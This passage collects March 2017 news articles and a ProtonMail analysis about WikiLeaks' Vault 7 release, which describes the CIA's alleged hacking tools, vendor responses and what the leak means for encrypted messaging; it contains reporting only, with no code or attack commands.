“UMBRAGE components cover keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques.”

The team maintains a library of techniques borrowed from in-the-wild malware. The team has multiple purposes, the knowledge of attack patterns, of course, could help the agencies in forensics investigations to rapidly attribute the action of attackers to a specific actor.

But there is also another explanation, the library could be easily included in the CIA’s projects to achieve the following goals:

To reduce the cost and time to develop hacking tools to use in the cyber operations.

To make harder the attribution of cyber attacks and causing others threat actors to be blamed for the agency’s false flag operations.

The documents confirm that the technique borrowed by Umbrage team was the wiping component used by the dreaded Shamoon malware, the malicious code that destroyed more than 30,000 computers at Saudi Aramco in 2012.

Since December, security experts observed a spike in the number of attacks linked to a new variant the malware, so-called Shamoon 2.

The first Shamoon variant abused a commercial digitally-signed driver called RawDisk developed by a company named Eldos.

The experts at the Umbrage team used the same technique implemented by the Shamoon malware. They devised a method to bypass the license check for the RawDisk driver and implemented the same disk wiping technique in an internal hacking tool dubbed Rebound.

Then when malware researchers were discovering a Rebound sample in some systems they identified it as a Shamoon variant instead of the CIA implant.

The UMBRAGE team has many other techniques and tools in its arsenal. The experts were able for example to reproduce a persistence technique borrowed from the HiKit rootkit.

The CIA hackers are able to implement the webcam capture feature used by the infamous DarkComet RAT and also sandbox evasion techniques borrowed from the Trojan Upclicker and the Nuclear Exploit Pack.

CIA Umbrage team

The Umbrage was also inspired by the code leaked in 2015 from the Italian surveillance company Hacking Team.

The CIA experts focused their efforts on the implementation of the set of implants used by the Hacking Team designed to hack Windows systems.

“If one is interested in using some implementations found in the source code, it should be considered a best practice to extract the desired pieces, and thoroughly review and test the extracted pieces,” is reported in the leaked files.

Unfortunately, many other intelligence agencies may have used a similar technique to deceive investigators.


10 Things You Need To Know About 'Wikileaks CIA Leak'
8.3.2017 thehackernews BigBrothers

Yesterday WikiLeaks published thousands of documents revealing top CIA hacking secrets, including the agency's ability to break into iPhones, Android phones, smart TVs, and Microsoft, Mac and Linux operating systems.
It dubbed the first release as Vault 7.
Vault 7 is just the first part of leak series “Year Zero” that WikiLeaks will be releasing in coming days. Vault 7 is all about a covert global hacking operation being run by the US Central Intelligence Agency (CIA).
According to the whistleblower organization, the CIA did not inform the companies about the security issues of their products; instead held on to security bugs in software and devices, including iPhones, Android phones, and Samsung TVs, that millions of people around the world rely on.
One leaked document suggested that the CIA was even looking for tools to remotely control smart cars and trucks, allowing the agency to cause "accidents" which would effectively be "nearly undetectable assassinations."
While security experts, companies and non-profit organizations are still reviewing 8,761 documents released as Vault 7 archive, we are here with some relevant facts and points that you need to know.
Here's Everything You Need to Know About Vault 7:
WikiLeaks Exposes CIA's Mobile Hacking Secrets
Vault7 — CIA has an impressive list of ways to hack into your iOS, Android & Windows phones.
Vault 7 purportedly includes 8,761 documents and files that detail intelligence information on CIA-developed software intended to crack any Android smartphone or Apple iPhone, including some that could take full control of the devices.
In fact, Wikileaks alleges that the CIA has a sophisticated unit in its Mobile Development Branch that develops zero-day exploits and malware to "infest, control and exfiltrate data from iPhones and other Apple products running iOS, such as iPads."
Some of the attacks are powerful enough to allow an attacker to remotely take over the "kernel," the heart of the operating system that controls the smartphone operation, or to gain "root" access on the devices, giving the attacker access to information like geolocation, communications, contacts, and more.
These types of attacks would most likely be useful for targeted hacking, rather than mass surveillance.
The leaked documents also detail some specific attacks the agency can perform on certain smartphones models and operating systems, including recent versions of iOS and Android.
CIA Didn't Break Encryption Apps, Instead Bypassed It
Vault7 — CIA-made phone malware can read your private chats without breaking encryption.
In the hours since the documents were made available by WikiLeaks, a misconception was developed, making people believe the CIA "cracked" the encryption used by popular secure messaging software including Signal and WhatsApp.
WikiLeaks asserted that:
"These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloakman by hacking the "smart" phones that they run on and collecting audio and message traffic before encryption is applied."
This statement by WikiLeaks made most people think that the encryption used by end-to-end encrypted messaging clients such as Signal and WhatsApp has been broken.
No, it hasn't.
Instead, the CIA has tools to gain access to entire phones, which would of course "bypass" encrypted messaging apps because it fails all other security systems virtually on the phone, granting total remote access to the agency.
The WikiLeaks documents do not show any attack particular against Signal or WhatsApp, but rather the agency hijacks the entire phone and listens in before the applications encrypt and transmit information.
It’s like you are sitting in a train next to the target and reading his 2-way text conversation on his phone or laptop while he's still typing, this doesn't mean that the security of the app the target is using has any issue.
In that case, it also doesn't matter if the messages were encrypted in transit if you are already watching everything that happens on the device before any security measure comes into play.
But this also doesn't mean that this makes the issue lighter, as noted by NSA whistleblower Edward Snowden, "This incorrectly implies CIA hacked these apps/encryption. But the docs show iOS/Android are what got hacked—a much bigger problem."
CIA Develops Malware to targets Windows, Linux & MacOS
Vault7 — CIA also develops cross-platform malware to hack Windows, MacOS & Linux Computers
The Wikileaks CIA dump also includes information about the malware that can be used by the agency to hack, remotely spy on and control PCs running Windows, macOS, and Linux operating systems.
This apparently means that the CIA can bypass PGP email encryption and even Virtual Private Network (VPN) on your computer in a similar way. The agency can also see everything you are doing online, even if you are hiding it behind Tor Browser.
Again, this also does not mean that using PGP, VPNs, or Tor Browser is not safe or that the CIA can hack into these services.
But the agency's ability to hack into any OS to gain full control of any device — whether it’s a smartphone, a laptop, or a TV with a microphone — makes the CIA capable of bypassing any service spy on everything that happens on that device.
CIA Borrowed Codes from Public Malware Samples
Vault7 — CIA uses codes from publicly available #malware samples to build its own spyware.
Yes, in addition to the attacks purportedly developed by the CIA, the agency has adopted some of the code from other, public sources of malware. Well, that's what many does.
One of the documents mentions how the agency supposedly tweaks bits of code from known malware samples to develop its custom code and more targeted solutions.
"The UMBRAGE team maintains a library of application development techniques borrowed from in-the-wild malware," the WikiLeaks document reads. "The goal of this repository is to provide functional code snippets that can be rapidly combined into custom solutions."
Some of the exploits listed were discovered and released by security firms, hacker groups, independent researchers, and purchased, or otherwise acquired by the CIA from other intelligence agencies, such as the FBI, NSA, and GCHQ.
One borrowed exploit in "Data Destruction Components" includes a reference to Shamoon, a nasty malware that has the capability to steal data and then completely wipe out hard-drives.
Another acquired attack by the CIA is SwampMonkey, which allows the agency to get root privileges on undisclosed Android devices.
Persistence, another tool in the CIA arsenal, allows the agency to gain control over the target device whenever it boots up again.
CIA Used Malware-Laced Apps to Spy on Targets
Vault7 — Fine Dining Attack: CIA used #malware-laced apps to spy on its targets.
The leaked documents include a file, named "Fine Dining," which does not contain any list of zero-day exploits or vulnerabilities, but a collection of malware-laced applications.
Fine Dining is a highly versatile technique which can be configured for a broad range of deployment scenarios, as it is meant for situations where the CIA agent has to infect a computer physically.
CIA field agents store one or more of these infected applications -- depending upon their targets -- on a USB, which they insert in their target's system to run one of the applications to gather the data from the device.
Developed by OSB (Operational Support Branch), a division of the CIA's Center for Cyber Intelligence, Fine Dining includes modules that can be used to weaponize following applications:
VLC Player Portable
Irfanview
Chrome Portable
Opera Portable
Firefox Portable
ClamWin Portable
Kaspersky TDSS Killer Portable
McAfee Stinger Portable
Sophos Virus Removal
Thunderbird Portable
Opera Mail
Foxit Reader
LibreOffice Portable
Prezi
Babel Pad
Notepad++
Skype
Iperius Backup
Sandisk Secure Access
U3 Software
2048
LBreakout2
7-Zip Portable
Portable Linux CMD Prompt
The CIA's Desperation To Crack Apple's Encryption
Vault7 — CIA has desperately been working for years to break Apple's Encryption.
This is not the first time when the CIA has been caught targeting iOS devices. It was previously disclosed that the CIA was targeting Apple's iPhones and iPads, following the revelation of top-secret documents from the agency's internal wiki system in 2015 from the Snowden leaks.
The documents described that the CIA had been "targeting essential security keys used to encrypt data stored on Apple's devices" by using both "physical" and "non-invasive" techniques.
In addition to the CIA, the FBI hacking division Remote Operations Unit has also been working desperately to discover exploits in iPhones, one of the WikiLeaks documents indicates.
That could also be the reason behind the agency's effort to force Apple into developing a working exploit to hack into the iPhone belonging to one of the terrorists in the San Bernardino case.
Apple Says It Has Already Patched Most Flaws Documented in CIA Leak
Vault7 — Apple says it has already patched many iOS vulnerabilities revealed in CIA Leaks.
Besides vulnerabilities in Android and Samsung Smart TVs, the leaked documents detail 14 iOS exploits, describing how the agency uses these security issues to track users, monitor their communications, and even take complete control of their phones.
However, Apple is pushing back against claims that the CIA's stored bugs for its devices were effective.
According to Apple, many iOS exploits in the Wikileaks CIA document dump have already been patched in its latest iOS version, released in January, while Apple engineers continue to work to address any new vulnerabilities that were known to the CIA.
Here's the statement provided by an Apple spokesperson:
"Apple is deeply committed to safeguarding our customers’ privacy and security. The technology built into today’s iPhone represents the best data security available to consumers, and we’re constantly working to keep it that way. Our products and software are designed to quickly get security updates into the hands of our customers, with nearly 80 percent of users running the latest version of our operating system. While our initial analysis indicates that many of the issues leaked today were already patched in the latest iOS, we will continue work to rapidly address any identified vulnerabilities. We always urge customers to download the latest iOS to make sure they have the most recent security updates."
Hacking 'Anyone, Anywhere,' Thanks to Internet Of 'Insecure' Things
Vault7 — CIA can hack your Smart TV and other smart devices to spy on you.
Besides hundreds of exploits, zero-days, and hacking tools that targets a large number of software and services, Vault 7 also includes details about a surveillance technique — codenamed Weeping Angel — used by the CIA to infiltrate smart TVs.
Samsung smart TVs are found to be vulnerable to Weeping Angel hacks that place the TVs into a "Fake-Off" mode, in which the owner believes the TV is off when it is actually on, allowing the CIA to covertly record conversations "in the room and sending them over the Internet to a covert CIA server."
"Weeping Angel already hooks key presses from the remote (or TV goes to sleep) to cause the system to enter Fake-Off rather than Off," the leaked CIA document reads. "Since the implant is already hooking these events, the implant knows when the TV will be entering Fake-Off mode."
In response to the WikiLeaks CIA documents, Samsung released a statement that reads: "Protecting consumers' privacy and the security of our devices is a top priority at Samsung. We are aware of the report in question and are urgently looking into the matter."
WikiLeaks' CIA Leak Isn't Bigger than Snowden's NSA Leaks
The CIA isn't more advanced than the NSA TAO Team and Vault 7 leak isn’t even bigger than Snowden .
WikiLeaks claims the massive CIA hacking leak is larger than the Edward Snowden revelations about NSA's hacking and surveillance programs, but it is much much smaller.
While the Snowden revelations disclosed the global covert surveillance through text, the voice of people using hacking tools that permitted mass data gathering and analysis, the CIA data dump so far just shows that the CIA gathered and purchased tools that could be used to target individual devices.
However, there is no evidence of mass surveillance of smartphones or computers in the leaked documents. Technologically, the NSA is much more forward in sophistication and technical expertise than the CIA.
Ex-CIA Chief Says Wikileaks dump has made US 'less safe'
Vault7 — Ex-CIA Chief says CIA files leaked by Wikileaks is incredibly damaging and has put lives at risk.
Former CIA boss Michael Hayden said the latest leak of highly sensitive CIA documents and files by Wikileaks is "incredibly damaging" and has put lives at risk, BBC reports, while the CIA has not yet commented on the leaks.
The CIA revelations by the whistleblower organization are just beginning. People will see more revelations about the government and agencies from the WikiLeaks in coming days as part of its Year Zero leaks.


"Vault 7" Leak Shows CIA Learned From NSA Mistakes

8.3.2017 securityweek BigBrothers
WikiLeaks’ “Vault 7” release appears to confirm that the U.S. National Security Agency (NSA) was behind the threat actor tracked as the “Equation Group.” Documents also show that the Central Intelligence Agency (CIA) learned from the NSA’s mistakes after its activities were exposed by security researchers.

Files allegedly obtained from a high-security CIA network provide details on the intelligence agency’s vast hacking capabilities. One of the files made available by WikiLeaks contains a discussion thread titled “What did Equation do wrong, and how can we avoid doing the same?”

The operations of the Equation Group and its links to the NSA were detailed by Kaspersky Lab in February 2015, and the discussion made public by WikiLeaks was initiated a few days later.

Participants in the discussion pointed out that one of the NSA’s biggest mistakes was that its tools shared code, including custom cryptography, giving researchers the data needed to connect different malware to the same group.

“The ‘custom’ crypto is more of NSA falling to its own internal policies/standards which came about in response to prior problems,” one user wrote.

In addition to using the same custom cryptographic algorithm, the CIA identified several other mistakes made by the NSA, including the reuse of exploits, use of internal tool names in the code, and the use of a unique mutex.

“All their tools shared code. The custom RC5 was everywhere. The techniques for positive ID (hashing) was used in the same way in multiple tools across generations,” another user said.

“The shared code appears to be the largest single factor is allowing [Kaspersky Lab] to tie all these tools together. The acquisition and use of C&C domains was probably number 2 on the list, and I'm sure the [Computer Operations Group] infrastructure people are paying attention to this.”

The Vault 7 files show that in addition to learning from the NSA’s mistakes, the CIA “borrowed” techniques from in-the-wild malware and tools, including Shamoon, UpClicker and the Nuclear exploit kit.

Security firms have started assessing the impact of the exposed hacking capabilities. WikiLeaks has not released any exploits, which makes it difficult to determine exactly what the CIA programs are capable of. However, at first sight, the intelligence agency’s tools don’t appear to be very sophisticated.


Security Firms Assess Impact of CIA Leak

8.3.2017 securityweek BigBrothers
Security firms have started assessing the impact of the CIA hacking tools exposed on Tuesday by WikiLeaks as part of the leak dubbed “Vault 7.”

Files allegedly obtained from a high-security CIA network appear to show that the intelligence agency has tools for hacking everything, including mobile devices, desktop computers, routers, smart TVs and cars.

The published files also appear to show that the CIA has targeted the products of many security solutions providers, including anti-malware and secure messaging applications. The list of affected vendors includes Symantec, Kaspersky, Avira, F-Secure, Microsoft, Bitdefender, Panda Security, Trend Micro, ESET, Avast, AVG, McAfee, Comodo and G Data.

While WikiLeaks has not released any of the exploits it has obtained, an initial investigation conducted by security firms indicates that the CIA’s capabilities may not be as advanced as some have suggested.

11h
Rob Graham٩(●̮̮̃●̃) @ErrataRob
...in 2017, phones with "monitor mode" are now some CIA cyber super weaponhttps://twitter.com/wikileaks/status/839210002694942725 …
Follow
Rob Graham٩(●̮̮̃●̃) @ErrataRob
..what Wikileaks won't tell you: almost everything in their dump is dreadfully ordinary, widely known by the cybersec/hacking community
4:46 AM - 8 Mar 2017
193 193 Retweets 213 213 likes

Bitdefender told SecurityWeek that the public Vault 7 files show that the CIA had been having problems evading the company’s products.

Kaspersky Lab said one of the vulnerabilities mentioned in the report was patched in 2009, while another was addressed in December 2015.

“All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release. The products mentioned in the Wikileaks report (KIS 7, KIS 8, WKSTN MP3) are outdated versions of Kaspersky Lab software and have been out of the technical support lifecycle for several years,” the security firm said in an emailed statement.CIA leak

“We would like to stress that the documents published by Wikileaks do not describe any computer breaches against Kaspersky Lab, or against any other security firms or customers, but instead depict efforts to reverse engineer and find vulnerabilities in computer security software products,” it added.

Comodo also said its product appeared to pose problems to the CIA. WikiLeaks mentioned that the agency had bypassed Comodo’s product by hiding malware in the Recycle Bin, but the vendor said such tricks would not have worked against versions of its product released in the past four years.

“What we are seeing in the leaked documents are their desperate attempts to build a hack, step-by-step, with the ultimate goal of achieving a total bypass of the security, such as trying to find something like a kernel exploit. But as their email says, in the case of Comodo, they end up with nothing,” said Melih Abdulhayoglu, founder and CEO of Comodo.

Microsoft, whose EMET and Security Essentials products are mentioned in the leak, told SecurityWeek that it’s aware of the report and looking into it. Trend Micro and F-Secure are also investigating.

“F-Secure is mentioned in the leak, citing the CIA can potentially bypass some of our products. But the question is really not whether the CIA can bypass our products, the answer to that is always yes. If they cannot do it right now, they invest another million to find a flaw,” said F-Secure’s Mikko Hypponen.

Panda Security says it has yet to find exploits or tools targeting its products in the publicly available files.

“That doesn't mean there won't be any, at the end of the day we are talking about software. We expected to be there, the fact that we do not collaborate in any way to spy on our users turns Panda into a target for the CIA, FSB, and that kind of organizations,” said Luis Corrons, Technical Director of PandaLabs.

As for enterprise security vendors, Juniper Networks has not found any evidence that its products have been targeted, but there appear to be several exploits targeting Cisco devices. Cisco has yet to release any information.

Secure messaging tools not compromised

WikiLeaks reported that the CIA had found a way to bypass the encryption of Signal, Telegram, WhatsApp and other secure messaging applications.

While many jumped to conclude that the agency had actually broken the encryption of these apps, WikiLeaks actually meant that gaining access to a mobile device using iOS and Android exploits could have given the CIA access to conversations, without having to break their encryption.


Wikileaks CIA Files – What this means for Internet security and encryption
8.3.2017 securityaffairs BigBrothers

Earlier today, Wikileaks dumped a large database of secret documents from the CIA in a released dubbed Vault7. Here we do a deeper analysis of the leak and the broader implications on online security and encrypted services.
Our in-depth analysis of the leaked CIA files is found at the bottom of this post. First, we will discuss the main question on everybody’s mind – how are encrypted services like ProtonMail impacted, and what insights did we gain into the strategies of state-backed attackers.

No, Encryption Is Not Dead
Immediately after the news broke, stories began circulating, along the lines of “Signal/Whatsapp encryption broken!”, fueled in part by Tweets put out by Wikileaks. This was followed predictably by online chatter speculating into whether or not ProtonMail had been cracked.

Vault7

We can state quite equivocally that there is nothing in the leaked CIA files which indicates any sort of crack of ProtonMail’s encryption. And despite claims to the contrary, there is also no evidence that Signal/Whatsapp end-to-end encryption has been breached. Here’s what we do know:

Over the past three years, the CIA has put together a formidable arsenal of cyberweapons specially designed to gain surveillance capabilities over end-user devices such as mobile phones and laptop/desktop computers. These advanced malwares enable the CIA to record actions such as keystrokes on a mobile device, allowing them to conduct surveillance without breaking encryption. Through this technique, US intelligence agencies can gain access to data before they have been encrypted. This is in fact the only way to achieve data access, because cracking the cryptography used in advanced secure communication services such as ProtonMail and Signal is still impractical with current technology.

In other words, the core cryptographic algorithms and techniques used by ProtonMail and other encrypted services remain secure. The exploitation of user endpoints (mobile phones, personal computers, etc) is actually not a new technique, but one that has existed since the first malware was created. This unfortunately is not something that cryptography is designed to defend against, as encryption by itself cannot guarantee the security of end-user devices. What the CIA files dumped by Wikileaks do reveal however, is a monumental shift in strategy since the last disclosure of this kind was made by Edward Snowden in 2013.

State-backed Cyberattack Strategy is Changing
ProtonMail is tool that is used by millions of people around the world to ensure email communications security. In addition to ordinary people and businesses, ProtonMail is also used by journalists, activists, and dissidents, who often require protection from government surveillance for their personal safety. Because of these factors, we make it our business to carefully study and understand state adversaries in order to better protect our userbase.

The Wikileaks CIA files is therefore, a comprehensive update into state cyberwarfare strategies since Snowden gave us the first edition. In fact, the trends that the files reveal are arguably global, since it is highly probable that other major players in this space (Russia, China, UK, Israel, etc) will have independently reached the same conclusions regarding overall strategy.

Some of the most interesting revelations from the Snowden leaks was the extent in which the NSA actively sought out information from the US tech giants, either with consent, or even without consent. This made a lot of sense, because the biggest global databases of sensitive personal data does not belong to the NSA, but actually to companies like Google and Facebook, who have already shown ample willingness to exploit such data for profit, sometimes via unscrupulous means.

Since 2013 however, the world has changed. Consumer and business awareness of online privacy and security is at an all time high, and more and more people around the world are increasingly choosing more secure services which respect privacy. Today, end-to-end encryption has gone mainstream, and services such as ProtonMail and Whatsapp boast millions of regular people as users. The use of end-to-end encryption means services such as ProtonMail are not actually able to decrypt user data. Even if we wanted to compromise user data, we do not have the technical means to decrypt the user emails. Furthermore, even if an attacker breached ProtonMail servers, all the emails stored on our servers are encrypted, so an attacker also would not be able to read user emails.

It’s clear from the leaked CIA documents that as the world has changed, stated-backed cyberattackers have also evolved. As we describe below, the varied leaked files are tied together by a common thread – an almost singular focus on producing malware to attack end-user devices. This is a logical response to the rise of end-to-end encrypted services such as ProtonMail. Services such as ProtonMail have significantly raised the barrier for obtaining data directly from the service provider, and many services are now based outside of the United States, beyond the reach of legal coercion. As such, it has now become easier, and more productive to directly hack individual users.

This opens up a terrifying new narrative where government spies are actively deploying viruses and trojans against their own citizens, joining the ranks of common cybercriminals. While this is by no means good news for privacy rights worldwide, it is in some ways, a win for privacy tech, because governments are having to shift away from mass surveillance and towards more targeted surveillance. In short, services such as ProtonMail are doing exactly what they were designed to do, which is raising barriers to large scale mass surveillance.

Our initial analysis into the Wikileaks CIA documents can be found below. Questions can be directed to media@protonmail.ch. If you would like to start benefiting from secure email, you can get a free ProtonMail account here.

Best Regards,
The ProtonMail Team

ProtonMail Analysis of Wikileaks CIA Documents
#Vault7 in a sentence: It is a leak about the CIA’s hacking arsenal used against foreign governments and citizens both domestically and abroad.

Name of the database: Vault7. It is the first part in a series of leaks titled Year Zero.

Origin: CIA’s Center for Cyber Intelligence unit in Langley, Virginia USA

Volume: 7,818 web pages with 943 attachments. According to Wikileaks, the entire archive of CIA material consists of several hundred million lines of computer code. Estimated to bigger than the Snowden leaks (unconfirmed).

Dates of documents: from the time Snowden left the intelligence community till 2016. 2013-2016.

Intention: the source of the information told WikiLeaks in a statement that they wish to initiate a public debate about the “security, creation, use, proliferation and democratic control of cyber weapons.”

How is it different from the Snowden leaks: Snowden leaks exposed the NSA and its techniques of blanket surveillance on citizens and governments around the world. Vault7, on the other hand, exposes the CIA and what technologies it uses in cyber warfare against foreign governments as well as against targeted individuals.

What did we learn so far?
As we are examining the documents, we have identified that the leak concerns the CIA and what cyber weapons it uses. Over the next weeks we will continue to verify and update the information. Below is what we know so far about the programs used by the CIA, legality of the operations, and what this means for your privacy and security.

Programs used by the CIA
Weeping Angel – It is a program that transforms the microphones of smart TVs into surveillance tools. By manipulating the hardware, CIA hackers are able to turn on people’s smart TVs and listen to users’ conversations. In effect, Weeping Angel transforms smart TVs into bugs.

Our team quickly drew parallels between Weeping Angel and other surveillance tools described by Snowden. Weeping Angel is a technique that bears close resemblance to Nosey Smurf, a tool used by UK’s GCHQ to turn on a phone’s microphone and use it for audio surveillance. While Tracker Smurf – is a geo-location tool that offers a more accurate method of locating a phone and its carrier than using triangulation.

Zero day – Refers to a general type of vulnerability used by the CIA against any adversary’s device. WikiLeaks reports that Zero Day has been primarily used against companies in industrial espionage. In 2013, Snowden, also, revealed that the NSA was committing industrial espionage against Brazilian, Russian and European oil companies, banks, airlines and trade delegations. According to Vault7, the program produced over “a thousand hacking systems, trojans, viruses, and other “weaponized” malware.”

Hive is a multi-platform CIA malware suite that can be specifically utilized against states. “The project provides customizable implants for Windows, Solaris, MikroTik (used in internet routers) and Linux platforms and a Listening Post (LP)/Command and Control (C2) infrastructure to communicate with these implants.”

There are many parallels between Hive and Zero Day and the 2010 Stuxnet virus that attacked and infected the Iranian Nuclear program. Although no state took responsibility for the attack in 2010, Stuxnet has been linked by political pundits to American and Israeli surveillance and intelligence agencies due to its degree of sophistication.

Hacking mobiles
Vault7 also reveals that the CIA has developed advanced capabilities for hacking mobile phones. The leaks show that the agency developed and used its tool to primarily control mobile phones and then extract data from them.

CIA’s Mobile Development Branch produces malware to pull data from iPhones and other Apple products running iOS, such as iPads. MDB also targets Android OS which is a much popular system than iOS and is the default operating system for the majority of smartphones including Sony, Samsung and Google Pixel. “Year Zero” shows that as of 2016 the CIA had 24 “weaponized” Android “zero days” which it has developed itself and obtained from GCHQ, NSA and cyber arms contractors.

Framing other governments
We were alarmed by the discovery of a tool that allows the CIA to potentially frame foreign governments for its cyber warfare acts. It works as follows. Imagine that each government or a hacking group has its own signature move or malicious software or a combination of both that it uses to attack its targets. After a while, whenever an attack occurs, it can be linked to to group based on that fingerprint.

WikiLeaks reports that a program ran by its Remote Devices Branch called UMBRAGE “collects and stores an extensive library of attack techniques”. According to Vault7, amassed techniques include those that are frequently used by Russia.

Some of the techniques currently at CIA’s disposal via UMBRAGE include: keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques.

Vault7 reveals that the CIA has also produced rules on how its malware should be hidden when deployed to avoid any fingerprints leading back to the US or the agency.

Was this legal?
Preliminary findings reveal that the CIA had known about and enhanced the dissemination of these tools. In fact, according to WikiLeaks, the agency wanted the programs to be legal so that agents or CIA sponsored hackers can operate with full impunity.

According to Vault7, if ‘CIA software was classified then officers could be prosecuted or dismissed for violating rules that prohibit placing classified information onto the Internet. As a result- “the CIA has secretly made most of its cyber spying/war code unclassified”. The U.S. government is not able to assert copyright either, due to restrictions in the U.S. Constitution. This means that cyber ‘arms’ manufactures and computer hackers can freely “pirate” these ‘weapons’ if they are obtained. The CIA has primarily had to rely on obfuscation to protect its malware secret.

Why is this critical?
While we are still mapping the dangers of such findings and capabilities, some conclusions are clear.

The CIA can frame other governments
By using Hive and Zero Day, the US can wage a cyber attack against a nation state while purposefully leaving behind a trace that leads to another state. As governments around the world migrate their infrastructure control to cyber space – any cyber attack can have a devastating effect if targeted against hospitals, power plants or telecommunications providers.

CIA backdoors can be exploited by others
When the CIA undermines a service or a device, it creates the backdoor that can be abused by other parties. With the agency’s newly revealed tools, everything people do or say around their phones and TV’s can create a very revealing and intimate picture of people’s lives.


WikiLeaks releases documents detailing CIA hacking tools and capabilities
8.3.2017 securityaffairs BigBrothers

WikiLeaks has obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking tools and capabilities
WikiLeaks announced on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA).

The huge trove of data, called “Vault 7,” exposed the hacking capabilities of the US Intelligence Agency and its internal infrastructure.

“The first full part of the series, “Year Zero”, comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virgina.” reads the announcement issued by WikiLeaks by Wikileaks.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.”

According to Wikileaks, the precious archive appears to have been circulated among former US government experts and contractors in an unauthorized manner. One of them likely provided the files to WikiLeaks.

The archive includes confidential information, malicious codes, and exploits specifically designed to target popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

The hacking tools developed by the US cyber spies can target mobile devices, desktop computers, and IoT devices such as routers and smart TVs.

The arsenal used by the Central Intelligence Agency hackers was composed of hacking tools developed by the CCI’s Engineering Development Group (EDG).

The developers at EDG are tacked for developing and testing any kind of malicious code, including implants, backdoors, exploits, Trojans and viruses.

The CIA has dozens of zero-day exploit code in its arsenal that can be used to target almost any platform, from Windows and Linux PC, to Android and iOS mobile devices.

“CIA malware and hacking tools are built by EDG (Engineering Development Group), a software development group within CCI (Center for Cyber Intelligence), a department belonging to the CIA’s DDI (Directorate for Digital Innovation).” continues Wikileaks.

WikiLeaks confirmed that it will not release the tools and exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons’ should analyzed, disarmed and published.”

Wikileaks CIA hacking tools

The leaked documents also revealed that the CIA used hacking tools developed by the British intelligence agencies (GCHQ and MI5), the NSA, the FBI and also contractors.

The documents refer a joint development of the CIA and MI5 for the development of a malware, dubbed Weeping Angel, that was used to compromise Samsung Smart TV.

“The attack against Samsung smart TVs was developed in cooperation with the United Kingdom’s MI5/BTSS. After infestation, Weeping Angel places the target TV in a ‘Fake-Off’ mode, so that the owner falsely believes the TV is off when it is on. In ‘Fake-Off’ mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.” continues Wikileaks.

The documents confirm that the CIA hackers were able to bypass the encryption implemented by most popular secure messaging apps such as Signal, WhatsApp, and Telegram.

The leaked files disconcerting scenario, the CIA was in possession of tools that were able to hack almost any platform, from modern vehicles to air-gapped systems.


WikiLeaks Exposed CIA's Hacking Tools And Capabilities Details
7.3.2017 thehackernews BigBrothers

WikiLeaks has published a massive trove of confidential documents in what appear to be the biggest ever leak involving the US Central Intelligence Agency (CIA).
WikiLeaks announced series Year Zero, under which the whistleblower organization will reveal details of the CIA's global covert hacking program.
As part of Year Zero, Wikileaks published its first archive, dubbed Vault 7, which includes a total of 8,761 documents of 513 MB (torrent | password) on Tuesday, exposing information about numerous zero-day exploits developed for iOS, Android, and Microsoft's Windows operating system.
WikiLeaks claims that these leaks came from a secure network within the CIA's Center for Cyber Intelligence headquarters at Langley, Virginia.
The authenticity of such dumps can not be verified immediately, but since WikiLeaks has long track record of releasing such top secret government documents, the community and governments should take it very seriously.
CIA's Zero-Day Exploits & Ability to Bypass Encrypted Apps
According to initial analysis and press release, the leak sheds light on the CIA's entire hacking capabilities, including its ability to hack smartphones and popular social media messaging apps including the world's most popular WhatsApp messaging app.
"These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Weibo, Confide and Cloackman by hacking the smartphones that they run on and collecting audio and message traffic before encryption is applied," WikiLeaks said.
The exploits come from a variety of sources, including partner agencies like NSA and GCHQ or private exploit traders, as well as the CIA's specialized unit in its Mobile Development Branch that develops zero-day exploits and malware for hacking smartphones, including iPhones and iPads.
"By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other weaponized malware," WikiLeaks said.
The agency can remotely activate smartphones' cameras and microphones at its will, allowing it to hack social media platforms before encryption can be applied, WikiLeaks claims in the statement on their website.
"Weeping Angel" Attack — Hacking Smart TVs to Spy On Users
Vault 7 also details a surveillance technique — codenamed Weeping Angel — used by the agency to infiltrate smart TV's, transforming them into covert microphones.
Samsung smart TVs, which previously drew criticism for their always-on voice command system, are vulnerable to Weeping Angel hacks that place the TVs into a “Fake-Off” mode.
In Fake-Off mode, the TV owner believes it is off when it is actually on, allowing the CIA to record conversations "in the room and sending them over the Internet to a covert CIA server."
HammerDrill v2.0: A Malware to Steal Data From Air Gapped PCs
The CIA's cyberweapon arsenal also includes a cross-platform malware, dubbed Hammer Drill, that targets Microsoft, Linux, Solaris, MacOS, and other platforms via viruses infecting through CDs/DVDs, USBs, data hidden in images, and other sophisticated malware.
What more interesting? Hammer Drill v2.0 also added air gap jumping ability used to target computers that are isolated from the Internet or other networks and believed to be the most secure computers on the planet.
Besides listing all hacking tools and operations, the documents also include instructions for using those hacking tools, tips on the configuration of Microsoft Visual Studio (which is classified as Secret/NOFORN), as well as testing notes for various hacking tools.
Some of the leaked documents even suggest that the CIA was even developing tools to remotely control certain vehicle software, allowing the agency to cause "accidents" which would effectively be "nearly undetectable assassinations."
For more details on the leak, you can peruse on the WikiLeaks' website.


WikiLeaks Releases Details on CIA Hacking Tools

7.3.2017 securityweek BigBrothers
WikiLeaks revealed on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA). The leak, dubbed “Vault 7,” apparently exposes the CIA’s vast hacking capabilities.

WikiLeaks said the files come from the CIA’s Center for Cyber Intelligence (CCI) in Langley, Virginia, and they have been circulating among former U.S. government hackers and contractors. One of these individuals provided the data to the whistleblower organization, which has called it “the largest intelligence publication in history.”

